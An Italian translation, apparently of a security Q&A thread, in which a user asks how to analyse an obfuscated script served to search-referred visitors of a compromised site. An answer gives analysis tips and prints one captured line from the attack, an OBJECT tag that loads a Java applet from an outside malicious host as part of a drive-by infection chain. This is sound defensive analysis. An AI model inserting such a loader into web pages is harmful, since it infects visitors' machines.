Identifica il codice in esecuzione sul sito web

2

Normalmente non mi occupo di problemi di sicurezza in Internet, ma questo mi ha interessato.

Il problema riguarda un sito specifico, diciamo example.com e il modo in cui lo ha visitato.

Se l'indirizzo è digitato direttamente nel browser, il sito web funziona correttamente.

Se l'indirizzo viene cercato in google / bing / yahoo e seguito, viene fornito un reindirizzamento 302 che conduce a: un sito di gioco d'azzardo, una pagina di errore o una pagina Web che contiene solo uno script codificato.

La mia domanda qui è, come posso identificare ciò che questo script sta facendo?

Lo script catturato può essere trovato nel seguente contenitore della pasta. link

    
posta Danial Wayne 22.05.2013 - 00:55
fonte

2 risposte

4

È possibile sostituire attentamente chiamate e proprietà non sicure come eval e innerHTML e quindi eseguire lo script. Per sicurezza, disattiva tutti i plugin del browser. Per essere più sicuro, puoi farlo in una macchina virtuale.

L'ho fatto per il tuo file paticolare. Succede:

  1. Un file Java viene caricato utilizzando <OBJECT CLASSID="clsid:5852F5ED-8BF4-11D4-A245-080C6F74284" width="1" height="1"><PARAM name="app" value="http://fjetymxvbndyz.bounceme.net/fine/beliees_rights.php?jnlp=b00725b396"/></OBJECT>

  2. Questo script è caricato. È una libreria di rilevamento delle versioni dei plug-in del browser con un carico utile che verifica la versione e carica file diversi a seconda dei plug-in. Qui è una versione abbellita senza la libreria.

risposta data 22.05.2013 - 01:48
fonte
0

Sembra che il Javascript che stai guardando sia offuscato. Questa è una pratica generale se non vuoi che i tuoi utenti sappiano cosa sta facendo il tuo script. La mia ipotesi è che potrebbe essere guardando l'intestazione di riferimento e se è da uno di quei siti che dici, semplicemente lo reindirizza. Ciò dovrebbe idealmente essere fatto sul lato server, ma anche in questo caso è piuttosto semplice da superare e andare alla pagina corretta.

    
risposta data 22.05.2013 - 01:21
fonte

Leggi altre domande sui tag